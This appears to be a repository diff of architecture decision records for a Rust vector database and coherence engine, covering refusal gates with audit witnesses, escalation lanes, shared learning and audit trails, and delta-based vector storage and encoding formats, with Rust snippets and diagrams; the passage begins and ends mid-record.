- **AI Agents**: Logical contradiction between belief and evidence
- **Finance**: Regime mismatch between positions
- **Medical**: Clinical disagreement between vitals and diagnosis
- **Robotics**: Physical impossibility between sensor and plan
- **Security**: Authorization violation between permission and action
The weighted residual norm |r_e|² is always "how much these two things disagree."
## Consequences
### Benefits
- Universal semantics: "disagreement" makes sense everywhere
- Quantitative: larger residual = bigger problem
- Localizable: can identify which edges contribute most
### Risks
- Restriction map design determines what "disagreement" means
- Poor maps give meaningless residuals
## References
- ADR-014: Coherence Engine Architecture
- ADR-CE-009: Single Coherence Object

View File

@@ -0,0 +1,48 @@
# ADR-CE-012: Gate = Refusal Mechanism with Witness
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
When coherence energy exceeds threshold, the system must refuse action. This refusal needs to be:
- Deterministic (same inputs → same decision)
- Auditable (why was it refused?)
- Provable (cryptographic witness)
## Decision
**Gate = refusal mechanism with witness - every refusal is provable.**
Gate evaluation produces:
```rust
pub struct GateDecision {
pub allow: bool,
pub lane: ComputeLane,
pub witness: WitnessRecord,
pub denial_reason: Option<String>,
}
```
The WitnessRecord includes:
- Energy snapshot at decision time
- Policy bundle that defined thresholds
- Hash chain to previous witness
- Content hash for integrity
## Consequences
### Benefits
- Every refusal has cryptographic proof
- Can reconstruct exactly why any decision was made
- Compliance-ready audit trail
### Risks
- Witness storage overhead
- Must handle witness retrieval at scale
## References
- ADR-014: Coherence Engine Architecture, Section 3
- ADR-CE-005: First-Class Governance Objects

View File

@@ -0,0 +1,46 @@
# ADR-CE-013: Not Prediction
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
Most AI systems try to predict what will happen. This is fundamentally limited:
- Future is uncertain
- Predictions can be confidently wrong
- No structural guarantees
## Decision
**Not prediction - system shows safe/unsafe action, not what will happen.**
The coherence engine answers a different question:
| Prediction Systems | Coherence Systems |
|--------------------|-------------------|
| "What will happen?" | "Does the world still fit together?" |
| Probabilistic confidence | Mathematical consistency |
| Can be confidently wrong | Knows when it doesn't know |
| Trust the model | Trust the math |
The coherence field shows:
- Where action is safe (low energy)
- Where action must stop (high energy)
It does NOT predict outcomes.
## Consequences
### Benefits
- Honest uncertainty: "I don't know" is a valid answer
- No false confidence in predictions
- Structural guarantees, not statistical ones
### Risks
- Users may expect predictions
- Requires education on coherence vs. confidence
## References
- ADR-014: Coherence Engine Architecture, "The Coherence Vision"

View File

@@ -0,0 +1,46 @@
# ADR-CE-014: Reflex Lane Default
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
A coherence system that escalates too often becomes:
- Slow (every operation waits for heavy compute)
- Noisy (constant human escalations)
- Ignored (users bypass the system)
## Decision
**Reflex lane default - most updates stay low-latency, escalation only on sustained incoherence.**
Design principles:
1. **Default to Lane 0**: Most operations complete in <1ms
2. **Transient spikes tolerated**: Brief energy increases don't escalate
3. **Persistence triggers escalation**: Only sustained/growing incoherence moves up lanes
4. **Human lane is last resort**: Lane 3 only when automated systems cannot resolve
Persistence detection:
```rust
fn is_escalation_needed(history: &EnergyHistory, window: Duration) -> bool {
history.is_above_threshold(threshold, window) ||
history.is_trending_up(window)
}
```
## Consequences
### Benefits
- System stays responsive under normal operation
- Escalation is meaningful (not noise)
- Users trust the system (it's not crying wolf)
### Risks
- Might miss real problems that appear transient
- Persistence window requires tuning
## References
- ADR-014: Coherence Engine Architecture, Section 3
- ADR-CE-006: Compute Ladder

View File

@@ -0,0 +1,44 @@
# ADR-CE-015: Adapt Without Losing Control
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
Static systems become stale. Adaptive systems can drift or be gamed. The coherence engine needs to:
- Learn from experience
- Improve over time
- Maintain governance and control
## Decision
**Adapt without losing control - persistent tracking enables learning within governance.**
Adaptation mechanisms:
1. **Threshold autotuning**: SONA proposes, humans approve
2. **Learned restriction maps**: GNN training with EWC++ (no forgetting)
3. **ReasoningBank patterns**: Store successful approaches
4. **Deterministic replay**: Verify adaptations against history
Control mechanisms:
1. **Policy bundles require signatures**: No unauthorized changes
2. **Witness chain is immutable**: Cannot hide past decisions
3. **Lineage tracking**: Every adaptation has provenance
4. **Rollback support**: Can revert to previous policy
## Consequences
### Benefits
- System improves with experience
- Governance maintained throughout
- Can audit all adaptations
### Risks
- Adaptation speed limited by approval process
- Learning quality depends on trace quality
## References
- ADR-014: Coherence Engine Architecture
- ADR-CE-007: Threshold Autotuning

View File

@@ -0,0 +1,52 @@
# ADR-CE-016: RuvLLM CoherenceValidator Uses Sheaf Energy
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
RuvLLM's `CoherenceValidator` currently uses heuristic scoring to detect:
- Semantic inconsistency
- Factual contradictions
- Logical errors
These heuristics are:
- Pattern-based (can be fooled)
- Not mathematically grounded
- Difficult to explain
## Decision
**RuvLLM CoherenceValidator uses sheaf energy, not heuristic scores.**
Integration:
```rust
pub struct SheafCoherenceValidator {
graph: SheafGraph,
gate: CoherenceGate,
inner: CoherenceValidator, // Fallback
}
```
Process:
1. Convert context and response to sheaf nodes
2. Add edges for semantic implications
3. Compute coherence energy
4. Gate decision replaces heuristic score
## Consequences
### Benefits
- Mathematical proof of inconsistency, not pattern matching
- Explainable: can show which edges have high residuals
- Unified with Prime-Radiant governance
### Risks
- Requires embedding quality for node states
- Edge creation logic needs domain expertise
## References
- ADR-014: Coherence Engine Architecture, "RuvLLM Integration"
- ruvllm/src/quality/coherence.rs

View File

@@ -0,0 +1,51 @@
# ADR-CE-017: Unified Audit Trail
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
RuvLLM has `WitnessLog` for inference audit. Prime-Radiant has `WitnessRecord` for coherence decisions. Two separate audit trails create:
- Fragmented compliance story
- Difficult cross-referencing
- Duplicate storage
## Decision
**WitnessLog and Prime-Radiant governance share single audit trail.**
Unified structure:
```rust
pub struct UnifiedWitnessLog {
coherence_witnesses: Vec<WitnessRecord>,
inference_witnesses: WitnessLog,
}
pub struct GenerationWitness {
inference: InferenceWitness,
coherence: WitnessRecord,
hash_chain: Hash,
}
```
Every LLM generation links:
- Inference witness (what was generated)
- Coherence witness (why it was allowed)
- Hash chain (tamper-evident ordering)
## Consequences
### Benefits
- Single audit trail for compliance
- Cross-reference inference ↔ coherence decisions
- Reduced storage (shared chain)
### Risks
- Migration from two systems to one
- Both systems must agree on witness format
## References
- ADR-014: Coherence Engine Architecture, "RuvLLM Integration"
- ADR-CE-005: First-Class Governance Objects

View File

@@ -0,0 +1,48 @@
# ADR-CE-018: Pattern-to-Restriction Bridge
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
RuvLLM's `ReasoningBank` stores successful patterns with verdicts. Prime-Radiant's restriction maps define constraints. These can reinforce each other:
- Successful patterns → what "coherence" looks like
- Failed patterns → what "incoherence" looks like
## Decision
**ReasoningBank patterns feed learned restriction map training.**
Bridge process:
```rust
impl PatternToRestrictionBridge {
fn learn_from_verdict(&mut self, pattern_id: PatternId, verdict: Verdict) {
if verdict.success_score > 0.8 {
// Success: train ρ to produce zero residual
self.restriction_maps[pattern_id]
.train(source, target, zero_residual);
} else {
// Failure: train ρ to produce high residual
self.restriction_maps[pattern_id]
.train(source, target, failure_residual);
}
}
}
```
## Consequences
### Benefits
- Experience improves constraint accuracy
- Successful patterns define "good" coherence
- Failed patterns help detect future failures
### Risks
- Biased patterns lead to biased constraints
- Need sufficient positive and negative examples
## References
- ADR-014: Coherence Engine Architecture, "RuvLLM Integration"
- ruvllm/src/reasoning_bank/

View File

@@ -0,0 +1,55 @@
# ADR-CE-019: Memory as Nodes
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
RuvLLM has three memory types:
- `AgenticMemory`: Long-term patterns
- `WorkingMemory`: Current context
- `EpisodicMemory`: Conversation history
These memories can contradict each other. Currently no systematic way to detect.
## Decision
**AgenticMemory, WorkingMemory, EpisodicMemory become sheaf nodes.**
Integration:
```rust
pub struct MemoryCoherenceLayer {
agentic: AgenticMemory,
working: WorkingMemory,
episodic: EpisodicMemory,
graph: SheafGraph,
}
```
When memory is added:
1. Create sheaf node with memory embedding
2. Add edges to related memories
3. Compute coherence energy
4. Alert if incoherent memory detected
Edge types:
- Temporal: Episode N should be consistent with N-1
- Semantic: Related facts should agree
- Hierarchical: Specific facts consistent with general patterns
## Consequences
### Benefits
- Detect contradictory memories before they cause problems
- Unified coherence across all memory types
- Can query "is my context self-consistent?"
### Risks
- Overhead for every memory write
- Edge creation requires semantic analysis
## References
- ADR-014: Coherence Engine Architecture, "RuvLLM Integration"
- ruvllm/src/context/

View File

@@ -0,0 +1,49 @@
# ADR-CE-020: Confidence from Energy
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
RuvLLM's `ConfidenceChecker` produces confidence scores, but:
- Scores are heuristic-based
- "Confidence" is often miscalibrated
- No mathematical grounding
Coherence energy provides a principled alternative.
## Decision
**Confidence scores derived from coherence energy with sigmoid mapping.**
Mapping:
```rust
fn confidence_from_energy(energy: f32, scale: f32, threshold: f32) -> f32 {
// Low energy → high confidence
// High energy → low confidence
let scaled = scale * (energy - threshold);
1.0 / (1.0 + scaled.exp())
}
```
Properties:
- Energy = 0 → Confidence ≈ 1.0 (perfectly coherent)
- Energy = threshold → Confidence = 0.5 (uncertain)
- Energy >> threshold → Confidence → 0 (incoherent)
## Consequences
### Benefits
- Confidence has mathematical grounding
- "I don't know" is provable (high energy)
- Calibration through energy scale tuning
### Risks
- Sigmoid parameters need tuning
- Different domains may need different mappings
## References
- ADR-014: Coherence Engine Architecture, "RuvLLM Integration"
- ADR-CE-013: Not Prediction

View File

@@ -0,0 +1,52 @@
# ADR-CE-021: Shared SONA
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
Both RuvLLM and Prime-Radiant use SONA for adaptive tuning:
- RuvLLM: Quality thresholds, routing weights
- Prime-Radiant: Coherence thresholds, escalation triggers
Running two SONA instances wastes resources and may learn conflicting adaptations.
## Decision
**SonaIntegration shared between ruvllm and Prime-Radiant.**
Shared components:
- `SonaEngine`: Single instance with multiple learning targets
- `ReasoningBank`: Unified pattern storage
- `EWC++`: Consolidated knowledge across both systems
Configuration:
```rust
pub struct SharedSona {
engine: SonaEngine,
llm_targets: Vec<LlmLearningTarget>,
coherence_targets: Vec<CoherenceLearningTarget>,
}
```
Learning coordination:
- Both systems contribute trajectories
- EWC++ prevents forgetting across domains
- Patterns accessible to both systems
## Consequences
### Benefits
- Unified adaptation reduces resource usage
- Cross-domain learning (LLM patterns help coherence, vice versa)
- Consistent behavior across systems
### Risks
- Coupling between systems
- Bad learning in one domain affects both
## References
- ADR-014: Coherence Engine Architecture, "RuvLLM Integration"
- sona crate documentation

View File

@@ -0,0 +1,56 @@
# ADR-CE-022: Failure Learning
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
RuvLLM's `ErrorPatternLearner` detects:
- Repeated error patterns
- Systematic failures
- Edge cases that cause problems
This knowledge should improve Prime-Radiant's detection.
## Decision
**ErrorPatternLearner updates restriction maps on failure detection.**
Process:
1. ErrorPatternLearner identifies failure pattern
2. Extract embeddings from failure context
3. Compute what residual "should have been" (high, since failure)
4. Train restriction map to produce high residual for similar inputs
5. Future similar inputs trigger coherence warning
Integration:
```rust
impl ErrorPatternLearner {
fn on_error_pattern_detected(&self, pattern: ErrorPattern) {
let bridge = self.restriction_bridge.lock();
bridge.learn_failure_pattern(
pattern.context_embedding,
pattern.output_embedding,
pattern.severity,
);
}
}
```
## Consequences
### Benefits
- System learns from mistakes
- Future similar failures detected proactively
- Restriction maps become smarter over time
### Risks
- False positive errors teach wrong constraints
- Need to distinguish systematic vs. random failures
## References
- ADR-014: Coherence Engine Architecture, "RuvLLM Integration"
- ADR-CE-018: Pattern-to-Restriction Bridge
- ruvllm/src/reflection/error_pattern.rs

View File

@@ -0,0 +1,453 @@
# ADR-DB-001: Delta Behavior Core Architecture
**Status**: Proposed
**Date**: 2026-01-28
**Authors**: RuVector Architecture Team
**Deciders**: Architecture Review Board
**SDK**: Claude-Flow
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-28 | Architecture Team | Initial proposal |
---
## Context and Problem Statement
### The Incremental Update Challenge
Traditional vector databases treat updates as atomic replacements - when a vector changes, the entire vector is stored and the index is rebuilt or patched. This approach has significant limitations:
1. **Network Inefficiency**: Transmitting full vectors for minor adjustments wastes bandwidth
2. **Storage Bloat**: Write-ahead logs grow linearly with vector dimensions
3. **Index Thrashing**: Frequent small changes cause excessive index reorganization
4. **Temporal Blindness**: Update history is lost, preventing rollback and analysis
5. **Concurrency Bottlenecks**: Full vector locks block concurrent partial updates
### Current Ruvector State
Ruvector's existing architecture (ADR-001) uses:
- Full vector replacement via `VectorEntry` structs
- HNSW index with mark-delete (no true incremental update)
- REDB transactions at vector granularity
- No delta compression or tracking
### The Delta-First Vision
Delta-Behavior transforms ruvector into a **delta-first vector database** where:
- All mutations are expressed as deltas (incremental changes)
- Full vectors are composed from delta chains on read
- Indexes support incremental updates with quality guarantees
- Conflict resolution uses CRDT semantics for concurrent edits
---
## Decision
### Adopt Delta-First Architecture with Layered Composition
We implement a delta-first architecture with the following design principles:
```
+-----------------------------------------------------------------------------+
| DELTA APPLICATION LAYER |
| Delta API | Vector Composition | Temporal Queries | Rollback |
+-----------------------------------------------------------------------------+
|
+-----------------------------------------------------------------------------+
| DELTA PROPAGATION LAYER |
| Reactive Push | Backpressure | Causal Ordering | Broadcast |
+-----------------------------------------------------------------------------+
|
+-----------------------------------------------------------------------------+
| DELTA CONFLICT LAYER |
| CRDT Merge | Vector Clocks | Operational Transform | Conflict Detection |
+-----------------------------------------------------------------------------+
|
+-----------------------------------------------------------------------------+
| DELTA INDEX LAYER |
| Lazy Repair | Quality Bounds | Checkpoint Snapshots | Incremental HNSW |
+-----------------------------------------------------------------------------+
|
+-----------------------------------------------------------------------------+
| DELTA ENCODING LAYER |
| Sparse | Dense | Run-Length | Dictionary | Adaptive Switching |
+-----------------------------------------------------------------------------+
|
+-----------------------------------------------------------------------------+
| DELTA STORAGE LAYER |
| Append-Only Log | Delta Chains | Compaction | Compression |
+-----------------------------------------------------------------------------+
```
### Core Data Structures
#### Delta Representation
```rust
/// A delta representing an incremental change to a vector
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct VectorDelta {
/// Unique delta identifier
pub delta_id: DeltaId,
/// Target vector this delta applies to
pub vector_id: VectorId,
/// Parent delta (for causal ordering)
pub parent_delta: Option<DeltaId>,
/// The actual change
pub operation: DeltaOperation,
/// Vector clock for conflict detection
pub clock: VectorClock,
/// Timestamp of creation
pub timestamp: DateTime<Utc>,
/// Replica that created this delta
pub origin_replica: ReplicaId,
/// Optional metadata changes
pub metadata_delta: Option<MetadataDelta>,
}
/// Types of delta operations
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum DeltaOperation {
/// Create a new vector (full vector as delta from zero)
Create { vector: Vec<f32> },
/// Sparse update: change specific dimensions
Sparse { indices: Vec<u32>, values: Vec<f32> },
/// Dense update: full vector replacement
Dense { vector: Vec<f32> },
/// Scale all dimensions
Scale { factor: f32 },
/// Add offset to all dimensions
Offset { amount: f32 },
/// Apply element-wise transformation
Transform { transform_id: TransformId },
/// Delete the vector
Delete,
}
```
#### Delta Chain
```rust
/// A chain of deltas composing a vector's history
pub struct DeltaChain {
/// Vector ID this chain represents
pub vector_id: VectorId,
/// Checkpoint: materialized snapshot
pub checkpoint: Option<Checkpoint>,
/// Deltas since last checkpoint
pub pending_deltas: Vec<VectorDelta>,
/// Current materialized vector (cached)
pub current: Option<Vec<f32>>,
/// Chain metadata
pub metadata: ChainMetadata,
}
/// Materialized snapshot for efficient composition
pub struct Checkpoint {
pub vector: Vec<f32>,
pub at_delta: DeltaId,
pub timestamp: DateTime<Utc>,
pub delta_count: u64,
}
```
### Delta Lifecycle
```
┌─────────────────────────────────────────────────────┐
│ DELTA LIFECYCLE │
└─────────────────────────────────────────────────────┘
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐
│ CREATE │ --> │ ENCODE │ --> │PROPAGATE│ --> │ RESOLVE │ --> │ APPLY │
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └─────────┘
│ │ │ │ │
v v v v v
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐
│ Delta │ │ Hybrid │ │Reactive │ │ CRDT │ │ Lazy │
│Operation│ │Encoding │ │ Push │ │ Merge │ │ Repair │
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └─────────┘
```
---
## Decision Drivers
### 1. Network Efficiency (Minimize Bandwidth)
| Requirement | Implementation |
|-------------|----------------|
| Sparse updates | Only transmit changed dimensions |
| Delta compression | Multi-tier encoding strategies |
| Batching | Temporal windows for aggregation |
### 2. Storage Efficiency (Minimize Writes)
| Requirement | Implementation |
|-------------|----------------|
| Append-only log | Delta log with periodic compaction |
| Checkpointing | Materialized snapshots at intervals |
| Compression | LZ4/Zstd on delta batches |
### 3. Consistency (Strong Guarantees)
| Requirement | Implementation |
|-------------|----------------|
| Causal ordering | Vector clocks per delta |
| Conflict resolution | CRDT-based merge semantics |
| Durability | WAL with delta granularity |
### 4. Performance (Low Latency)
| Requirement | Implementation |
|-------------|----------------|
| Read path | Cached current vectors |
| Write path | Async delta propagation |
| Index updates | Lazy repair with quality bounds |
---
## Considered Options
### Option 1: Full Vector Replacement (Status Quo)
**Description**: Continue with atomic vector replacement.
**Pros**:
- Simple implementation
- No composition overhead on reads
- Index always exact
**Cons**:
- Network inefficient for sparse updates
- No temporal history
- No concurrent partial updates
**Verdict**: Rejected - does not meet incremental update requirements.
### Option 2: Event Sourcing with Vector Events
**Description**: Full event sourcing where current state is derived from event log.
**Pros**:
- Complete audit trail
- Perfect temporal queries
- Natural undo/redo
**Cons**:
- Read amplification (must replay all events)
- Unbounded storage growth
- Complex query semantics
**Verdict**: Partially adopted - delta log is event-sourced with materialization.
### Option 3: Delta-First with Materialized Views
**Description**: Primary storage is deltas; materialized vectors are caches.
**Pros**:
- Best of both worlds
- Efficient writes (delta only)
- Efficient reads (materialized cache)
- Full temporal history
**Cons**:
- Cache invalidation complexity
- Checkpoint management
- Conflict resolution needed
**Verdict**: Adopted - provides optimal balance.
### Option 4: Operational Transformation (OT)
**Description**: Use OT for concurrent delta resolution.
**Pros**:
- Well-understood concurrency model
- Used by Google Docs, etc.
**Cons**:
- Complex transformation functions
- Central server typically required
- Vector semantics don't map cleanly
**Verdict**: Rejected - CRDT better suited for vector semantics.
---
## Technical Specification
### Delta API
```rust
/// Delta-aware vector database trait
pub trait DeltaVectorDB: Send + Sync {
/// Apply a delta to a vector
fn apply_delta(&self, delta: VectorDelta) -> Result<DeltaId>;
/// Apply multiple deltas atomically
fn apply_deltas(&self, deltas: Vec<VectorDelta>) -> Result<Vec<DeltaId>>;
/// Get current vector (composing from delta chain)
fn get_vector(&self, id: &VectorId) -> Result<Option<Vec<f32>>>;
/// Get vector at specific point in time
fn get_vector_at(&self, id: &VectorId, timestamp: DateTime<Utc>)
-> Result<Option<Vec<f32>>>;
/// Get delta chain for a vector
fn get_delta_chain(&self, id: &VectorId) -> Result<DeltaChain>;
/// Rollback to specific delta
fn rollback_to(&self, id: &VectorId, delta_id: &DeltaId) -> Result<()>;
/// Compact delta chain (merge deltas, create checkpoint)
fn compact(&self, id: &VectorId) -> Result<()>;
/// Search with delta-aware semantics
fn search_delta(&self, query: &DeltaSearchQuery) -> Result<Vec<SearchResult>>;
}
```
### Composition Algorithm
```rust
impl DeltaChain {
/// Compose current vector from checkpoint and pending deltas
pub fn compose(&self) -> Result<Vec<f32>> {
// Start from checkpoint or zero vector
let mut vector = match &self.checkpoint {
Some(cp) => cp.vector.clone(),
None => vec![0.0; self.dimensions],
};
// Apply pending deltas in causal order
for delta in self.pending_deltas.iter() {
self.apply_operation(&mut vector, &delta.operation)?;
}
Ok(vector)
}
fn apply_operation(&self, vector: &mut Vec<f32>, op: &DeltaOperation) -> Result<()> {
match op {
DeltaOperation::Sparse { indices, values } => {
for (idx, val) in indices.iter().zip(values.iter()) {
if (*idx as usize) < vector.len() {
vector[*idx as usize] = *val;
}
}
}
DeltaOperation::Dense { vector: new_vec } => {
vector.copy_from_slice(new_vec);
}
DeltaOperation::Scale { factor } => {
for v in vector.iter_mut() {
*v *= factor;
}
}
DeltaOperation::Offset { amount } => {
for v in vector.iter_mut() {
*v += amount;
}
}
// ... other operations
}
Ok(())
}
}
```
### Checkpoint Strategy
| Trigger | Description | Trade-off |
|---------|-------------|-----------|
| Delta count | Checkpoint every N deltas | Space vs. composition time |
| Time interval | Checkpoint every T seconds | Predictable latency |
| Composition cost | When compose > threshold | Adaptive optimization |
| Explicit request | On compact() or flush() | Manual control |
Default policy:
- Checkpoint at 100 deltas OR
- Checkpoint at 60 seconds OR
- When composition would exceed 1ms
---
## Consequences
### Benefits
1. **Network Efficiency**: 10-100x bandwidth reduction for sparse updates
2. **Temporal Queries**: Full history access, rollback, and audit
3. **Concurrent Updates**: CRDT semantics enable parallel writers
4. **Write Amplification**: Reduced through delta batching
5. **Index Stability**: Lazy repair reduces reorganization
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Composition overhead | Medium | Medium | Aggressive checkpointing, caching |
| Delta chain unbounded growth | Medium | High | Compaction policies |
| Conflict resolution correctness | Low | High | Formal CRDT verification |
| Index quality degradation | Medium | Medium | Quality bounds, forced repair |
### Performance Targets
| Metric | Target | Rationale |
|--------|--------|-----------|
| Delta application | < 50us | Must be faster than full write |
| Composition (100 deltas) | < 1ms | Acceptable read overhead |
| Checkpoint creation | < 10ms | Background operation |
| Network reduction (sparse) | > 10x | For <10% dimension changes |
---
## Implementation Phases
### Phase 1: Core Delta Infrastructure
- Delta types and storage
- Basic composition
- Simple checkpointing
### Phase 2: Propagation and Conflict Resolution
- Reactive push system
- CRDT implementation
- Causal ordering
### Phase 3: Index Integration
- Lazy HNSW repair
- Quality monitoring
- Incremental updates
### Phase 4: Optimization
- Advanced encoding
- Compression tiers
- Adaptive policies
---
## References
1. Shapiro, M., et al. "Conflict-free Replicated Data Types." SSS 2011.
2. Kleppmann, M. "Designing Data-Intensive Applications." O'Reilly, 2017.
3. ADR-001: Ruvector Core Architecture
4. ADR-CE-002: Incremental Coherence Computation
---
## Related Decisions
- **ADR-DB-002**: Delta Encoding Format
- **ADR-DB-003**: Delta Propagation Protocol
- **ADR-DB-004**: Delta Conflict Resolution
- **ADR-DB-005**: Delta Index Updates
- **ADR-DB-006**: Delta Compression Strategy
- **ADR-DB-007**: Delta Temporal Windows
- **ADR-DB-008**: Delta WASM Integration
- **ADR-DB-009**: Delta Observability
- **ADR-DB-010**: Delta Security Model

View File

@@ -0,0 +1,497 @@
# ADR-DB-002: Delta Encoding Format
**Status**: Proposed
**Date**: 2026-01-28
**Authors**: RuVector Architecture Team
**Deciders**: Architecture Review Board
**Parent**: ADR-DB-001 Delta Behavior Core Architecture
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-28 | Architecture Team | Initial proposal |
---
## Context and Problem Statement
### The Encoding Challenge
Delta-first architecture requires efficient representation of incremental vector changes. The encoding must balance multiple competing concerns:
1. **Compression Ratio**: Minimize storage and network overhead
2. **Encode/Decode Speed**: Low latency for real-time applications
3. **Composability**: Efficient sequential application of deltas
4. **Randomness Handling**: Both sparse and dense update patterns
### Update Patterns in Practice
Analysis of real-world vector update patterns reveals:
| Pattern | Frequency | Characteristics |
|---------|-----------|-----------------|
| Sparse Refinement | 45% | 1-10% of dimensions change |
| Localized Cluster | 25% | Contiguous regions updated |
| Full Refresh | 15% | Complete vector replacement |
| Uniform Noise | 10% | Small changes across all dimensions |
| Scale/Shift | 5% | Global transformations |
A single encoding cannot optimally handle all patterns.
---
## Decision
### Adopt Hybrid Sparse-Dense Encoding with Adaptive Switching
We implement a multi-format encoding system that automatically selects optimal representation based on delta characteristics.
### Encoding Formats
#### 1. Sparse Encoding
For updates affecting < 25% of dimensions:
```rust
/// Sparse delta: stores only changed indices and values
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SparseDelta {
/// Number of dimensions in original vector
pub dimensions: u32,
/// Changed indices (sorted, delta-encoded)
pub indices: Vec<u32>,
/// Corresponding values
pub values: Vec<f32>,
/// Optional: previous values for undo
pub prev_values: Option<Vec<f32>>,
}
impl SparseDelta {
/// Memory footprint
pub fn size_bytes(&self) -> usize {
8 + // dimensions + count
self.indices.len() * 4 + // indices
self.values.len() * 4 + // values
self.prev_values.as_ref().map_or(0, |v| v.len() * 4)
}
/// Apply to vector in place
pub fn apply(&self, vector: &mut [f32]) {
for (&idx, &val) in self.indices.iter().zip(self.values.iter()) {
vector[idx as usize] = val;
}
}
}
```
**Index Compression**: Delta-encoded + varint for sorted indices
```
Original: [5, 12, 14, 100, 105]
Delta: [5, 7, 2, 86, 5]
Varint: [05, 07, 02, D6 00, 05] (12 bytes vs 20 bytes)
```
#### 2. Dense Encoding
For updates affecting > 75% of dimensions:
```rust
/// Dense delta: full vector replacement
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DenseDelta {
/// New vector values
pub values: Vec<f32>,
/// Optional quantization
pub quantization: QuantizationMode,
}
#[derive(Debug, Clone, Copy, Serialize, Deserialize)]
pub enum QuantizationMode {
None, // f32 values
Float16, // f16 values (2x compression)
Int8, // 8-bit quantized (4x compression)
Int4, // 4-bit quantized (8x compression)
}
```
#### 3. Run-Length Encoding (RLE)
For contiguous region updates:
```rust
/// RLE delta: compressed contiguous regions
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct RleDelta {
pub dimensions: u32,
pub runs: Vec<Run>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Run {
/// Start index
pub start: u32,
/// Values in this run
pub values: Vec<f32>,
}
```
**Example**: Updating dimensions 100-150
```
RLE: { runs: [{ start: 100, values: [50 f32 values] }] }
Size: 4 + 4 + 200 = 208 bytes
vs Sparse: { indices: [50 u32], values: [50 f32] }
Size: 4 + 200 + 200 = 404 bytes
```
#### 4. Dictionary Encoding
For repeated patterns:
```rust
/// Dictionary-based delta for recurring patterns
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DictionaryDelta {
/// Reference to shared dictionary
pub dict_id: DictionaryId,
/// Pattern index in dictionary
pub pattern_id: u32,
/// Optional scaling factor
pub scale: Option<f32>,
/// Optional offset
pub offset: Option<f32>,
}
/// Shared dictionary of common delta patterns
pub struct DeltaDictionary {
pub patterns: Vec<SparseDelta>,
pub hit_count: Vec<u64>,
}
```
### Adaptive Format Selection
```rust
/// Select optimal encoding for delta
pub fn select_encoding(
old_vector: &[f32],
new_vector: &[f32],
config: &EncodingConfig,
) -> DeltaEncoding {
let dimensions = old_vector.len();
// Count changes
let changes: Vec<(usize, f32, f32)> = old_vector.iter()
.zip(new_vector.iter())
.enumerate()
.filter(|(_, (o, n))| (*o - *n).abs() > config.epsilon)
.map(|(i, (o, n))| (i, *o, *n))
.collect();
let change_ratio = changes.len() as f32 / dimensions as f32;
// Check for contiguous runs
let runs = detect_runs(&changes, config.min_run_length);
let run_coverage = runs.iter().map(|r| r.len()).sum::<usize>() as f32
/ changes.len().max(1) as f32;
// Check dictionary matches
let dict_match = config.dictionary.as_ref()
.and_then(|d| d.find_match(&changes, config.dict_threshold));
// Selection logic
match (change_ratio, run_coverage, dict_match) {
// Dictionary match with high similarity
(_, _, Some((pattern_id, similarity))) if similarity > 0.95 => {
DeltaEncoding::Dictionary(DictionaryDelta {
dict_id: config.dictionary.as_ref().unwrap().id,
pattern_id,
scale: None,
offset: None,
})
}
// Dense for >75% changes
(r, _, _) if r > 0.75 => {
DeltaEncoding::Dense(DenseDelta {
values: new_vector.to_vec(),
quantization: select_quantization(new_vector, config),
})
}
// RLE for high run coverage
(_, rc, _) if rc > 0.6 => {
DeltaEncoding::Rle(RleDelta {
dimensions: dimensions as u32,
runs: runs.into_iter().map(|r| r.into()).collect(),
})
}
// Sparse for everything else
_ => {
let (indices, values): (Vec<_>, Vec<_>) = changes.iter()
.map(|(i, _, n)| (*i as u32, *n))
.unzip();
DeltaEncoding::Sparse(SparseDelta {
dimensions: dimensions as u32,
indices,
values,
prev_values: None,
})
}
}
}
```
### Format Selection Flowchart
```
┌──────────────────┐
│ Compute Delta │
│ (old vs new) │
└────────┬─────────┘
┌────────v─────────┐
│ Dictionary Match │
│ > 95%? │
└────────┬─────────┘
┌───────────────┼───────────────┐
│ YES │ NO │
v │ │
┌───────────────┐ │ ┌────────v─────────┐
│ Dictionary │ │ │ Change Ratio │
│ Encoding │ │ │ > 75%? │
└───────────────┘ │ └────────┬─────────┘
│ │
│ ┌───────────┼───────────┐
│ │ YES │ NO │
│ v │ │
│ ┌─────────┐ │ ┌───────v───────┐
│ │ Dense │ │ │ Run Coverage │
│ │Encoding │ │ │ > 60%? │
│ └─────────┘ │ └───────┬───────┘
│ │ │
│ │ ┌───────┼───────┐
│ │ │ YES │ NO │
│ │ v │ v
│ │ ┌─────┐ ┌─────────┐
│ │ │ RLE │ │ Sparse │
│ │ └─────┘ │Encoding │
│ │ └─────────┘
```
---
## Benchmarks: Memory and CPU Tradeoffs
### Storage Efficiency by Pattern
